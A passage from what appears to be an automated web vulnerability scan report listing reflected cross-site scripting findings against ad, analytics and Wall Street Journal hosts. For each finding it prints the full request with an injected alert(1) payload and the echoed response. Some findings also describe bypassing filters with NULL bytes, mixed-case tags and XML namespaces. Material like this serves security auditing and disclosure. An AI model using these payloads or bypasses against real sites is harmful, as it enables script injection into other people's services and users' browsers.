Referer: http://online.barrons.com/static_html_files/GateFile.html?sub=amch&type=d_layer&survey_num=925807&site=9&code=927332&p=1&protocol=http&lang=&auto_ctl_invite=0&loc=aHR0cDovL2FkLmRvdWJsZWNsaWNrLm5ldC9hZGkvYmFycm9ucy5jb20vc2VhcmNoOyFjYXRlZ29yeT07bXNyYz1udWxsO251bGw7cHVibGljX290aGVyO3B0aWxlPTI7c3o9MzAweDI1MDtvcmQ9MTk1MDMxOTUwMzE5NTAzMTk1MDM7
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CS1=931683-4-1; ES=921286-wME{M-0; LP=1315138435; linkjumptest=1; endsurvey=no

Response

HTTP/1.1 200 OK
Date: Wed, 07 Sep 2011 12:34:21 GMT
Server: Apache/2.2.3
X-Powered-By: PHP/4.4.4
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-cache, must-revalidate
Pragma: no-cache
P3P: CP="ALL DSP COR PSAa PSDa OUR IND COM NAV INT LOC OTC", policyref="http://ch.questionmarket.com/w3c/audit2007/p3p_DynamicLogic.xml"
DL_S: b103.dl
Set-Cookie: LP=1315398861; expires=Sun, 11 Sep 2011 16:34:21 GMT; path=/; domain=.questionmarket.com
Content-Length: 2702
Content-Type: text/html

(function(){
var d=document,w=window,dle;

function ff(){
var p=w.parent,r;

while (p != top) {
try {
if (p.location.host == w.location.host)
   r = p.document.referrer;
} catch (e) { }

p = p.paren
...[SNIP]...
rame;
}
d=df.document;
if (!df.DL_already_ran){
dle=d.createElement('script');
dle.src='http://amch.questionmarket.com/adscgen/d_layer.php?sub=amch&type=d_layer&survey_num=925807&site=9&code=927332&p=1fee25'-alert(1)-'65069f0c0a8&protocol=http&lang=&auto_ctl_invite=0&loc=aHR0cDovL2FkLmRvdWJsZWNsaWNrLm5ldC9hZGkvYmFycm9ucy5jb20vc2VhcmNoOyFjYXRlZ29yeT07bXNyYz1udWxsO251bGw7cHVibGljX290aGVyO3B0aWxlPTI7c3o9MzAweDI1MDtvcmQ9MTk1MDMxOT
...[SNIP]...

1.42. http://amch.questionmarket.com/adscgen/dynamiclink.js.php [protocol parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://amch.questionmarket.com
Path:   /adscgen/dynamiclink.js.php

Issue detail

The value of the protocol request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload d00ae'%3balert(1)//5eba82bd623 was submitted in the protocol parameter. This input was echoed as d00ae';alert(1)//5eba82bd623 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adscgen/dynamiclink.js.php?sub=amch&type=d_layer&survey_num=925807&site=9&code=927332&p=1&protocol=httpd00ae'%3balert(1)//5eba82bd623&lang=&auto_ctl_invite=0&loc=aHR0cDovL2FkLmRvdWJsZWNsaWNrLm5ldC9hZGkvYmFycm9ucy5jb20vc2VhcmNoOyFjYXRlZ29yeT07bXNyYz1udWxsO251bGw7cHVibGljX290aGVyO3B0aWxlPTI7c3o9MzAweDI1MDtvcmQ9MTk1MDMxOTUwMzE5NTAzMTk1MDM7 HTTP/1.1
Host: amch.questionmarket.com
Proxy-Connection: keep-alive
Referer: http://online.barrons.com/static_html_files/GateFile.html?sub=amch&type=d_layer&survey_num=925807&site=9&code=927332&p=1&protocol=http&lang=&auto_ctl_invite=0&loc=aHR0cDovL2FkLmRvdWJsZWNsaWNrLm5ldC9hZGkvYmFycm9ucy5jb20vc2VhcmNoOyFjYXRlZ29yeT07bXNyYz1udWxsO251bGw7cHVibGljX290aGVyO3B0aWxlPTI7c3o9MzAweDI1MDtvcmQ9MTk1MDMxOTUwMzE5NTAzMTk1MDM7
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CS1=931683-4-1; ES=921286-wME{M-0; LP=1315138435; linkjumptest=1; endsurvey=no

Response

HTTP/1.1 200 OK
Date: Wed, 07 Sep 2011 12:34:23 GMT
Server: Apache/2.2.3
X-Powered-By: PHP/4.4.4
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-cache, must-revalidate
Pragma: no-cache
P3P: CP="ALL DSP COR PSAa PSDa OUR IND COM NAV INT LOC OTC", policyref="http://ch.questionmarket.com/w3c/audit2007/p3p_DynamicLogic.xml"
DL_S: b101.dl
Set-Cookie: LP=1315398863; expires=Sun, 11 Sep 2011 16:34:23 GMT; path=/; domain=.questionmarket.com
Content-Length: 2732
Content-Type: text/html

(function(){
var d=document,w=window,dle;

function ff(){
var p=w.parent,r;

while (p != top) {
try {
if (p.location.host == w.location.host)
   r = p.document.referrer;
} catch (e) { }

p = p.paren
...[SNIP]...
eight*1.01) {
doc_area = DL_width*DL_height;
biggestframe = df.frames[i];
}
}
df=biggestframe;
}
d=df.document;
if (!df.DL_already_ran){
dle=d.createElement('script');
dle.src='httpd00ae';alert(1)//5eba82bd623://amch.questionmarket.com/adscgen/d_layer.php?sub=amch&type=d_layer&survey_num=925807&site=9&code=927332&p=1&protocol=httpd00ae'%3balert(1)//5eba82bd623&lang=&auto_ctl_invite=0&loc=aHR0cDovL2FkLmRvdWJ
...[SNIP]...

1.43. http://amch.questionmarket.com/adscgen/dynamiclink.js.php [site parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://amch.questionmarket.com
Path:   /adscgen/dynamiclink.js.php

Issue detail

The value of the site request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload %005cfe5'-alert(1)-'0089328db21 was submitted in the site parameter. This input was echoed as 5cfe5'-alert(1)-'0089328db21 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /adscgen/dynamiclink.js.php?sub=amch&type=d_layer&survey_num=925807&site=9%005cfe5'-alert(1)-'0089328db21&code=927332&p=1&protocol=http&lang=&auto_ctl_invite=0&loc=aHR0cDovL2FkLmRvdWJsZWNsaWNrLm5ldC9hZGkvYmFycm9ucy5jb20vc2VhcmNoOyFjYXRlZ29yeT07bXNyYz1udWxsO251bGw7cHVibGljX290aGVyO3B0aWxlPTI7c3o9MzAweDI1MDtvcmQ9MTk1MDMxOTUwMzE5NTAzMTk1MDM7 HTTP/1.1
Host: amch.questionmarket.com
Proxy-Connection: keep-alive
Referer: http://online.barrons.com/static_html_files/GateFile.html?sub=amch&type=d_layer&survey_num=925807&site=9&code=927332&p=1&protocol=http&lang=&auto_ctl_invite=0&loc=aHR0cDovL2FkLmRvdWJsZWNsaWNrLm5ldC9hZGkvYmFycm9ucy5jb20vc2VhcmNoOyFjYXRlZ29yeT07bXNyYz1udWxsO251bGw7cHVibGljX290aGVyO3B0aWxlPTI7c3o9MzAweDI1MDtvcmQ9MTk1MDMxOTUwMzE5NTAzMTk1MDM7
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CS1=931683-4-1; ES=921286-wME{M-0; LP=1315138435; linkjumptest=1; endsurvey=no

Response

HTTP/1.1 200 OK
Date: Wed, 07 Sep 2011 12:34:17 GMT
Server: Apache/2.2.3
X-Powered-By: PHP/4.4.4
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-cache, must-revalidate
Pragma: no-cache
P3P: CP="ALL DSP COR PSAa PSDa OUR IND COM NAV INT LOC OTC", policyref="http://ch.questionmarket.com/w3c/audit2007/p3p_DynamicLogic.xml"
DL_S: b202.dl
Set-Cookie: LP=1315398857; expires=Sun, 11 Sep 2011 16:34:17 GMT; path=/; domain=.questionmarket.com
Content-Length: 2705
Content-Type: text/html

(function(){
var d=document,w=window,dle;

function ff(){
var p=w.parent,r;

while (p != top) {
try {
if (p.location.host == w.location.host)
   r = p.document.referrer;
} catch (e) { }

p = p.paren
...[SNIP]...
df=biggestframe;
}
d=df.document;
if (!df.DL_already_ran){
dle=d.createElement('script');
dle.src='http://amch.questionmarket.com/adscgen/d_layer.php?sub=amch&type=d_layer&survey_num=925807&site=9%005cfe5'-alert(1)-'0089328db21&code=927332&p=1&protocol=http&lang=&auto_ctl_invite=0&loc=aHR0cDovL2FkLmRvdWJsZWNsaWNrLm5ldC9hZGkvYmFycm9ucy5jb20vc2VhcmNoOyFjYXRlZ29yeT07bXNyYz1udWxsO251bGw7cHVibGljX290aGVyO3B0aWxlPTI7c3o9MzAweDI1MD
...[SNIP]...

1.44. http://api-public.addthis.com/url/shares.json [callback parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://api-public.addthis.com
Path:   /url/shares.json

Issue detail

The value of the callback request parameter is copied into the HTML document as plain text between tags. The payload 8cde5<script>alert(1)</script>0db736188ef was submitted in the callback parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /url/shares.json?url=http%3A%2F%2Fstockoodles.com%2F%3Fa%3DMSN-SRB&callback=_ate.cbs.sc_httpstockoodlescomaMSNSRB28cde5<script>alert(1)</script>0db736188ef HTTP/1.1
Host: api-public.addthis.com
Proxy-Connection: keep-alive
Referer: http://stockoodles.com/?a=MSN-SRB
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: loc=US%2COTUxMDFOQVVTQ0EyMTczMDU4MTgwNzczNjIwVg%3d%3d; dt=X; uid=0000000000000000; uvc=34|35,92|36

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Cache-Control: max-age=600
Content-Type: application/javascript;charset=UTF-8
Date: Wed, 07 Sep 2011 12:32:17 GMT
Content-Length: 94
Connection: close

_ate.cbs.sc_httpstockoodlescomaMSNSRB28cde5<script>alert(1)</script>0db736188ef({"shares":0});

1.45. http://api.bizographics.com/v1/profile.json [&callback parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://api.bizographics.com
Path:   /v1/profile.json

Issue detail

The value of the &callback request parameter is copied into the HTML document as plain text between tags. The payload a5dcf<script>alert(1)</script>661bf37752d was submitted in the &callback parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /v1/profile.json?&callback=dj.module.ad.bio.loadBizoDataa5dcf<script>alert(1)</script>661bf37752d&api_key=r9t72482usanbp6sphprhvun HTTP/1.1
Host: api.bizographics.com
Proxy-Connection: keep-alive
Referer: http://online.wsj.com/home-page
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BizographicsOptOut=OPT_OUT

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Content-Type: application/json
Date: Wed, 07 Sep 2011 12:21:02 GMT
P3P: CP="NON DSP COR CURa ADMo DEVo TAIo PSAo PSDo OUR DELa IND PHY ONL UNI COM NAV DEM"
Pragma: no-cache
Server: nginx/0.7.61
Content-Length: 219
Connection: keep-alive

dj.module.ad.bio.loadBizoDataa5dcf<script>alert(1)</script>661bf37752d({"bizographics":{"industry":[{"code":"business_services","name":"Business Services"}],"location":{"code":"texas","name":"USA - Texas"}},"usage":1});

1.46. http://api.bizographics.com/v1/profile.json [api_key parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://api.bizographics.com
Path:   /v1/profile.json

Issue detail

The value of the api_key request parameter is copied into the HTML document as plain text between tags. The payload 326f0<script>alert(1)</script>dc7df702c62 was submitted in the api_key parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /v1/profile.json?&callback=dj.module.ad.bio.loadBizoData&api_key=r9t72482usanbp6sphprhvun326f0<script>alert(1)</script>dc7df702c62 HTTP/1.1
Host: api.bizographics.com
Proxy-Connection: keep-alive
Referer: http://online.wsj.com/home-page
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BizographicsOptOut=OPT_OUT

Response

HTTP/1.1 403 Forbidden
Cache-Control: no-cache
Content-Type: text/plain
Date: Wed, 07 Sep 2011 12:21:04 GMT
P3P: CP="NON DSP COR CURa ADMo DEVo TAIo PSAo PSDo OUR DELa IND PHY ONL UNI COM NAV DEM"
Pragma: no-cache
Server: nginx/0.7.61
Set-Cookie: BizoID=aebbdc47-e882-4562-943a-4ec4a6e69e33;Version=0;Domain=.bizographics.com;Path=/;Max-Age=15768000
Content-Length: 84
Connection: keep-alive

Unknown API key: (r9t72482usanbp6sphprhvun326f0<script>alert(1)</script>dc7df702c62)

1.47. http://api.dimestore.com/viapi [id parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://api.dimestore.com
Path:   /viapi

Issue detail

The value of the id request parameter is copied into the HTML document as plain text between tags. The payload ac888<a>8f8f392bd8e was submitted in the id parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /viapi?action=pixel&id=eb2039789ac888<a>8f8f392bd8e HTTP/1.1
Host: api.dimestore.com
Proxy-Connection: keep-alive
Referer: http://view.atdmt.com/RGA/iview/350415430/direct/01/6854533?click=http://ad.doubleclick.net/click%3Bh%3Dv8/3b7b/3/0/%2a/b%3B245733871%3B0-0%3B0%3B46249204%3B3454-728/90%3B43845580/43863367/1%3B%3B%7Eokv%3D%3B%3Bpage%3DuberBannerAd%3Bmsrc%3DBOL_hpp_highlight_top%3B%3Bmc%3D0%3Btile%3D8%3Bsz%3D728x90%3B%3B%7Eaopt%3D2/0/ff/0%3B%7Esscs%3D%3f
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: nginx/0.6.35
Date: Wed, 07 Sep 2011 12:29:33 GMT
Content-Type: text/xml
Connection: keep-alive
Set-Cookie: pixel_eb2039789ac888<a>8f8f392bd8e=1; Expires=Thu, 06-Sep-2012 12:29:33 GMT
Content-Length: 55

// DIMESTORE PIXEL OK -- eb2039789ac888<a>8f8f392bd8e

1.48. http://api.dimestore.com/viapi [name parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://api.dimestore.com
Path:   /viapi

Issue detail

The value of the name request parameter is copied into the HTML document as plain text between tags. The payload 71e1a<a>9cf018d0a7 was submitted in the name parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /viapi?action=cookie&value=EyADRWJEY0FpdVF%252BSWQ%253D&name=IgUsFjsrORc3NyILDBo6HychGw%253D%253D71e1a<a>9cf018d0a7&mode=set HTTP/1.1
Host: api.dimestore.com
Proxy-Connection: keep-alive
Referer: http://content.dimestore.com/prod/swf/V3player.swf
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: pixel_eb2039789=1; respondentId=aa84b8a80c474deb8a2607134fb0172a; respondentEmail=""

Response

HTTP/1.1 200 OK
Server: nginx/0.6.35
Date: Wed, 07 Sep 2011 12:29:36 GMT
Content-Type: text/xml
Connection: keep-alive
Set-Cookie: IgUsFjsrORc3NyILDBo6HychGw%3D%3D71e1a<a>9cf018d0a7=EyADRWJEY0FpdVF%2BSWQ%3D; Expires=Thu, 06-Sep-2012 12:29:36 GMT
Content-Length: 187

<?xml version='1.0' encoding='iso-8859-1' ?>
<response><cookie><name>IgUsFjsrORc3NyILDBo6HychGw%3D%3D71e1a<a>9cf018d0a7</name><value>EyADRWJEY0FpdVF%2BSWQ%3D</value></cookie></response>

1.49. http://api.dimestore.com/viapi [name parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://api.dimestore.com
Path:   /viapi

Issue detail

The value of the name request parameter is copied into the XML document as plain text between tags. The payload 17115<a%20xmlns%3aa%3d'http%3a//www.w3.org/1999/xhtml'><a%3abody%20onload%3d'alert(1)'/></a>bf89301b6a1 was submitted in the name parameter. This input was echoed as 17115<a xmlns:a='http://www.w3.org/1999/xhtml'><a:body onload='alert(1)'/></a>bf89301b6a1 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The response into which the attack is echoed contains XML data, which is not by default processed by the browser as HTML. However, by injecting XML elements which create a new namespace it is possible to trick some browsers (including Firefox) into processing part of the response as HTML. Note that this proof-of-concept attack is designed to execute when processed by the browser as a standalone response, not when the XML is consumed by a script within another page.

Request

GET /viapi?action=cookie&name=IBogOiIBKgExLQYjCzIdPRcaNwEiEj0rfkN2fF4%253D17115<a%20xmlns%3aa%3d'http%3a//www.w3.org/1999/xhtml'><a%3abody%20onload%3d'alert(1)'/></a>bf89301b6a1&mode=get HTTP/1.1
Host: api.dimestore.com
Proxy-Connection: keep-alive
Referer: http://content.dimestore.com/prod/swf/V3player.swf
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: pixel_eb2039789=1; respondentId=aa84b8a80c474deb8a2607134fb0172a; respondentEmail=""

Response

HTTP/1.1 200 OK
Server: nginx/0.6.35
Date: Wed, 07 Sep 2011 12:29:35 GMT
Content-Type: text/xml
Connection: keep-alive
Content-Length: 244

<?xml version='1.0' encoding='iso-8859-1' ?>
<response><cookie><name>IBogOiIBKgExLQYjCzIdPRcaNwEiEj0rfkN2fF4%3D17115<a xmlns:a='http://www.w3.org/1999/xhtml'><a:body onload='alert(1)'/></a>bf89301b6a1</name>
...[SNIP]...

1.50. http://api.dimestore.com/viapi [value parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://api.dimestore.com
Path:   /viapi

Issue detail

The value of the value request parameter is copied into the XML document as plain text between tags. The payload f1146<a%20xmlns%3aa%3d'http%3a//www.w3.org/1999/xhtml'><a%3abody%20onload%3d'alert(1)'/></a>ac628cc6951 was submitted in the value parameter. This input was echoed as f1146<a xmlns:a='http://www.w3.org/1999/xhtml'><a:body onload='alert(1)'/></a>ac628cc6951 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The response into which the attack is echoed contains XML data, which is not by default processed by the browser as HTML. However, by injecting XML elements which create a new namespace it is possible to trick some browsers (including Firefox) into processing part of the response as HTML. Note that this proof-of-concept attack is designed to execute when processed by the browser as a standalone response, not when the XML is consumed by a script within another page.

Request

GET /viapi?action=cookie&value=EyADRWJEY0FpdVF%252BSWQ%253Df1146<a%20xmlns%3aa%3d'http%3a//www.w3.org/1999/xhtml'><a%3abody%20onload%3d'alert(1)'/></a>ac628cc6951&name=IgUsFjsrORc3NyILDBo6HychGw%253D%253D&mode=set HTTP/1.1
Host: api.dimestore.com
Proxy-Connection: keep-alive
Referer: http://content.dimestore.com/prod/swf/V3player.swf
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: pixel_eb2039789=1; respondentId=aa84b8a80c474deb8a2607134fb0172a; respondentEmail=""

Response

HTTP/1.1 200 OK
Server: nginx/0.6.35
Date: Wed, 07 Sep 2011 12:29:35 GMT
Content-Type: text/xml
Connection: keep-alive
Set-Cookie: IgUsFjsrORc3NyILDBo6HychGw%3D%3D="EyADRWJEY0FpdVF%2BSWQ%3Df1146<a xmlns:a='http://www.w3.org/1999/xhtml'><a:body onload='alert(1)'/></a>ac628cc6951"; Version=1; Max-Age=31536000
Content-Length: 258

<?xml version='1.0' encoding='iso-8859-1' ?>
<response><cookie><name>IgUsFjsrORc3NyILDBo6HychGw%3D%3D</name><value>EyADRWJEY0FpdVF%2BSWQ%3Df1146<a xmlns:a='http://www.w3.org/1999/xhtml'><a:body onload='alert(1)'/></a>ac628cc6951</value>
...[SNIP]...

1.51. http://cc.wsj.net/cdssvco/file/v2/Files [absolutePath parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://cc.wsj.net
Path:   /cdssvco/file/v2/Files

Issue detail

The value of the absolutePath request parameter is copied into the HTML document as plain text between tags. The payload 7f1db<ScRiPt>alert(1)</ScRiPt>9aedcc2b856 was submitted in the absolutePath parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain expressions that are often used in XSS attacks but this can be circumvented by varying the case of the blocked expressions - for example, by submitting "ScRiPt" instead of "script".

Remediation detail

Blacklist-based filters designed to block known bad inputs are usually inadequate and should be replaced with more effective input and output validation.

Request

GET /cdssvco/file/v2/Files?absolutePath=%2Fdjscript%2Fbucket%2FNA_WSJ_PUB%2Fpage%2F0_0_WG_HeaderOne%2Fprovided%2Fj_global_slim%2Fversion%2Fvblg31_201183.js7f1db<ScRiPt>alert(1)</ScRiPt>9aedcc2b856&absolutePath=%2Fpublic%2Fpage%2FNA_WSJ_PUB%3A0_0_WG_HeaderOne-none-vblg31_201183.html&c=dj.module._fileServiceDao.fragment_NA_WSJ_PUB_0_0_WG_HeaderOne HTTP/1.1
Host: cc.wsj.net
Proxy-Connection: keep-alive
Referer: http://blogs.wsj.com/digits/2011/09/06/yahoos-statement-on-carol-bartzs-removal-as-ceo/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Restlet-Framework/2.0.3
Accept-Ranges: bytes
Vary: Accept-Charset,Accept-Encoding,Accept-Language,Accept
Content-Type: application/x-javascript
P3P: CP=CAO DSP COR CURa ADMa DEVi TAIo PSAa PSDa IVDi CONi OTPi OUR OTRi BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA OTC
X-DEBUG-EMGSESSIONID: NULL
Date: Wed, 07 Sep 2011 12:21:15 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 227453

dj.module._fileServiceDao.fragment_NA_WSJ_PUB_0_0_WG_HeaderOne({"files":[{"absolutePath":"/djscript/bucket/NA_WSJ_PUB/page/0_0_WG_HeaderOne/provided/j_global_slim/version/vblg31_201183.js7f1db<ScRiPt>alert(1)</ScRiPt>9aedcc2b856","data":"dojo.provide(\"gravity.beacon\");\ndojo.require(\"dj.util.User\");\ndojo.require(\"dj.util.Cookie\");\n\ngravity.beacon = {\n\tinit: function() {\n\n\t\tdj.util.User.getUserId(function(_u){\n
...[SNIP]...

1.52. http://cc.wsj.net/cdssvco/file/v2/Files [c parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://cc.wsj.net
Path:   /cdssvco/file/v2/Files

Issue detail

The value of the c request parameter is copied into the HTML document as plain text between tags. The payload 38b7c<ScRiPt>alert(1)</ScRiPt>0566c56b2fc was submitted in the c parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain expressions that are often used in XSS attacks but this can be circumvented by varying the case of the blocked expressions - for example, by submitting "ScRiPt" instead of "script".

Remediation detail

Blacklist-based filters designed to block known bad inputs are usually inadequate and should be replaced with more effective input and output validation.

Request

GET /cdssvco/file/v2/Files?absolutePath=%2Fdjscript%2Fbucket%2FNA_WSJ_PUB%2Fpage%2F0_0_WG_HeaderOne%2Fprovided%2Fj_global_slim%2Fversion%2Fvblg31_201183.js&absolutePath=%2Fpublic%2Fpage%2FNA_WSJ_PUB%3A0_0_WG_HeaderOne-none-vblg31_201183.html&c=dj.module._fileServiceDao.fragment_NA_WSJ_PUB_0_0_WG_HeaderOne38b7c<ScRiPt>alert(1)</ScRiPt>0566c56b2fc HTTP/1.1
Host: cc.wsj.net
Proxy-Connection: keep-alive
Referer: http://blogs.wsj.com/digits/2011/09/06/yahoos-statement-on-carol-bartzs-removal-as-ceo/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Restlet-Framework/2.0.3
Accept-Ranges: bytes
Vary: Accept-Charset,Accept-Encoding,Accept-Language,Accept
Content-Type: application/x-javascript
P3P: CP=CAO DSP COR CURa ADMa DEVi TAIo PSAa PSDa IVDi CONi OTPi OUR OTRi BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA OTC
X-DEBUG-EMGSESSIONID: NULL
Date: Wed, 07 Sep 2011 12:21:19 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 227453

dj.module._fileServiceDao.fragment_NA_WSJ_PUB_0_0_WG_HeaderOne38b7c<ScRiPt>alert(1)</ScRiPt>0566c56b2fc({"files":[{"absolutePath":"/djscript/bucket/NA_WSJ_PUB/page/0_0_WG_HeaderOne/provided/j_global_slim/version/vblg31_201183.js","data":"dojo.provide(\"gravity.beacon\");\ndojo.require(\"dj.util.User\");
...[SNIP]...

1.53. http://dowjones.tt.omtrdc.net/m2/dowjones/mbox/ajax [mbox parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://dowjones.tt.omtrdc.net
Path:   /m2/dowjones/mbox/ajax

Issue detail

The value of the mbox request parameter is copied into the HTML document as plain text between tags. The payload 19297<script>alert(1)</script>711c5156631 was submitted in the mbox parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /m2/dowjones/mbox/ajax?mboxHost=online.wsj.com&mboxSession=1315416064836-197145&mboxPage=1315416073090-697223&screenHeight=1200&screenWidth=1920&browserWidth=1266&browserHeight=909&browserTimeOffset=-300&colorDepth=16&mboxCount=2&mbox=mboxCookieReader19297<script>alert(1)</script>711c5156631&mboxId=0&mboxTime=1315398071524&profile.subscriber=super%20user&mboxURL=http%3A%2F%2Fonline.wsj.com%2Farticle%2FSB10001424053111904537404576555250572211010.html%3Fmod%3DWSJ_hp_LEFTTopStories&mboxReferrer=http%3A%2F%2Fonline.wsj.com%2Fhome-page&mboxVersion=40 HTTP/1.1
Host: dowjones.tt.omtrdc.net
Proxy-Connection: keep-alive
Referer: http://online.wsj.com/article/SB10001424053111904537404576555250572211010.html?mod=WSJ_hp_LEFTTopStories
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
